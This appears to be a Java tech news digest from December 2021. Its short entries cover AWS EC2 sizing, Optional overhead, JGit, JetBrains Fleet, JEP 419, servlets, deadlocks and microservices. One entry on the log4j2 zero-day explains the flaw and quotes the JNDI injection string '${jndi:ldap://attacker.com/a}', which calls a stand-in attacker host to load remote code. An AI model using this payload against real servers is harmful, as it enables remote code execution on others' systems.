Java Tech News

2021-12-17 11:00:29 AWS Cost-to-Usage Optimizations for EC2 Instances
#aws #ec2 #ebs
• Look for instances that are underutilized; for example, instances with a maximum CPU and/or memory usage of less than 40% over a four-week period. These instances may be downsized by half to achieve a maximum usage of 80%.
• Look for instances with a steady utilization rate above the baseline utilization per vCPU. Monitor for CPUSurplusCreditsCharged and if this is above the breakeven point you may upgrade to an M5.
• Look for instances with correct memory utilization but a cpu utilization under 40%. These instances may be replaced with R5 that provide the same memory and half the CPUs at 75% the price of a T3.
• Look for network bandwidth utilization. T3 is capped at 5gbps; if you need more bandwidth, you may want to upgrade to an M5.
• The latest generation of instances are already EBS-Optimized by default; you can monitor EBS metrics such as EBSIOBalance% and EBSByteBalance% to help you determine whether your instances are sized right. Open / Comment

2021-12-16 23:01:23 Overhead of Returning Optional Values
#corelibs #performance
Optional class stores a value that might be absent. Every language adapts to null-safety as it the best practice. However, Java language imposes some performance tradeoffs of using Optional feature. As long as you don't write an extreme runtime performance program you shouldn't care much about it. But if we care about performance? How much do optionals actually cost?

Scalar replacement, inlining and escape analysis of JIT compilator have to perform proper optimizations on a simple benchmark as in the article. However, disassembly output of the benchmark with Optional shows that:
• Escape analysis failed to provide JIT good options for applying scalar replacement. However, the inlining of hot methods has been made.
• No SSE/AVX used anywhere. Sample hasn’t been vectorized, despite being an ideal case for vectorization.
• Performance degradation can be up to x8 worse than using plain scalar values.
pkolaczk.github.io/overhead-of-optional/ Open / Comment

2021-12-12 00:00:41 The Struggle of JGit
#git #performance
JGit is a lightweight, pure Java library implementation of the Git version control system. But still not lighter than the original implementation written in C. The choice of the language is always important when considering performance aspects of your program. Hence, JGit struggles with:
• Not having mmap(), memcpy(a,b,20) and other useful kernel operations. Hope soon we'll see foreign memory access API to resolve this issue.
• Not having unsigned types in Java. unsigned char or unsigned long doesn't exist in Java. Unfortunately, project Valhalla's value types are not going to support unsigned types.
• Not having an efficient way to represent a SHA-1. A byte[20] in Java will cost an additional 16 bytes of memory, and be slower to access because the bytes themselves are in a different area of memory from the container object.
marc.info/?l=git&m=124111702609723 Open / Comment

2021-12-11 12:00:00 RCE 0-day exploit found in log4j2
#security #bug #logging
Yesterday, the exploit was found in the log4j2 library that results in Remote Code Execution (RCE) by logging a certain string. Typically a logging library has one job to do: swallow the string as if it's some black box and spit it elsewhere as per provided configurations.

Turn out, Log4j doesn't treat strings as black boxes. Like with SQL injection, you can insert a variable into a string "${jndi:ldap://attacker.com/a}" and the server makes a request to attacker.com via JNDI. The response will contain a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

Although, it only works for improperly formatted logs:
// this is ok
log.debug("user-agent={}", userAgent);

// this is bad
log.debug("user-agent=" + userAgent);
lunasec.io/docs/blog/log4j-zero-day/ Open / Comment

2021-12-09 12:01:23 Fleet — All New Next Generation IDE By JetBrains
#ide
Recently JetBrains announced the upcoming release of Fleet IDE which is kind of competitor for the VS Code by Microsoft. Developers of Fleet built a fast and lightweight text editor with a file-browsing menu. Feels just like your usual IDE project but without any heavy features that slow down the initial load of the directory. Although, you can enable those features if you'd like with a switch button so your text editor transforms to a fully-fledged IDE.
• Fleet will be polyglot and extend IDE features for all popular languages
• Fleet's architecture is distributed and can be spun up in a cluster
• You can use Fleet remotely in a collaborative way using "Space"
blog.jetbrains.com/blog/2021/11/29/welcome-to-fleet/ Open / Comment

2021-12-07 00:01:19 JEP 419: Foreign Function & Memory API is transitioning to Preview
#jep419 #panama #jni
Panama project have been working on this JEP since Java 14 and now it is going to be released in preview mode in java.base module. The idea is to replace existing JNI with more safe and intuitive API that runs code and uses shared memory outside of JVM.

Why it's important?
Lot's of low-level APIs are written with the use of off-heap memory and kernel calls: JDBC, HTTP clients, NIO channels, local sockets.
• Libraries like Tensorflow, Ignite, Lucene, and Netty are using off-heap data instead of unpredictable garbage collected memory
• Unix system call mmap can be used for serialization/deserialization, but today's JVM has limitation for its usage
• JNI outlived itself. Java need to keep up with other langs that offer first-class native interoperation. Java developers need a simple-designed way to use native libraries in a platform-agnostic way.
mail.openjdk.java.net/pipermail/panama-dev/2021-December/015895.html Open / Comment

2021-12-06 12:01:21 What are Servlets?
#servlets #nio #web
Servlets API is used for client-server communication, commonly through HTTP. Java Servlets 2.2 became a part of J2EE in 1999, they introduced independent web applications in .war files. API was drastically improved in the 3.0 version and now it's distributed under the Jakarta Servlet API having 5.0 released version.

How do they work?
Servlets are just a convenient abstract layer for async kernel calls that acquire a socket to listen for incoming events. Events can be represented as handshakes over TCP connection.

How to use them?
Servlets need a container that will dispatch commands of the outside world to it. The web container is responsible for managing the lifecycle of servlets, mapping a URL to a particular servlet and ensuring that the URL requester has the correct access rights. Jetty, Netty, Tomcat, etc. can provide implementations for such a container and Spring will provide an embedded instance in runtime of any of them.
wikiwand.com/en/Jakarta_Servlet Open / Comment

2021-12-04 00:00:46 How to prevent Deadlocks?
#locks #concurrency #I0I
The locking approach to thread safety is powerful, but (unlike confinement and immutability) it introduces blocking into the program. It's fairly easy to experience a deadlock when implementing a monitor pattern. Here're a few simple deadlock solutions:
• Lock ordering — the ordering on the locks forces an ordering on the threads acquiring them, so there's no way to produce a cycle in the waiting-for graph.
• Coarse-grained locking — use a single lock to guard many object instances, or even a whole subsystem of a program. Although it will prevent a large piece of code to run concurrently.
• Lock Timeout — thread trying to obtain a lock will only try for so long before giving up by freeing all locks taken, wait for a random amount of time and then retry.
• Avoid the mutual exclusion or hold-and-wait for the shared resources. Open / Comment

2021-12-02 12:00:31 Common principles of breaking down a Monolith into Microservices
#monolith #microservices #architecture
• Define schema domains that are presented in the database. Put unrelated tables into separate categories — each category is a potential microservice. You will also need to break up queries into multiple simple queries that are merged at the application level.
• Second step would be to separate functional blocks out of a highly coupled modules. Start with core features and then work the way out with optional features.
• Make those services that don't require to be synchronous to be event-driven. Apply common patterns like two-phase transactions, circuit breaker and backoff retry.
• Outline common observability and security dependencies for all future microservices and create an out-of-the-box template for future generations of developers.
infoq.com/presentations/github-rails-monolith-microservices/ Open / Comment

2021-12-01 00:00:01 Parallelism vs. Concurrency
#parallelism #concurrency
• Concurrency is the problem of scheduling some computational resources that compete over those resources. Concurrency isn’t about handling tasks more quickly — i.e. with lower latency — but to complete as many of them as possible per time-unit, achieving high throughput. The canonical example of a concurrent program is a server that serves requests arriving over the wire.
• Parallelism is the problem of doing a single job. When we are breaking up the job into multiple cooperating subtasks (divide & conquer principle) they all can be running on a single core and utilize its resources to the maximum. For example, parallel merge sort is obviously using parallel (not concurrent) subtasks in its algorithm. Another example would be: virtual threads are intended for concurrency while the parallelStream is for parallelism.
inside.java/2021/11/30/on-parallelism-and-concurrency/ Open / Comment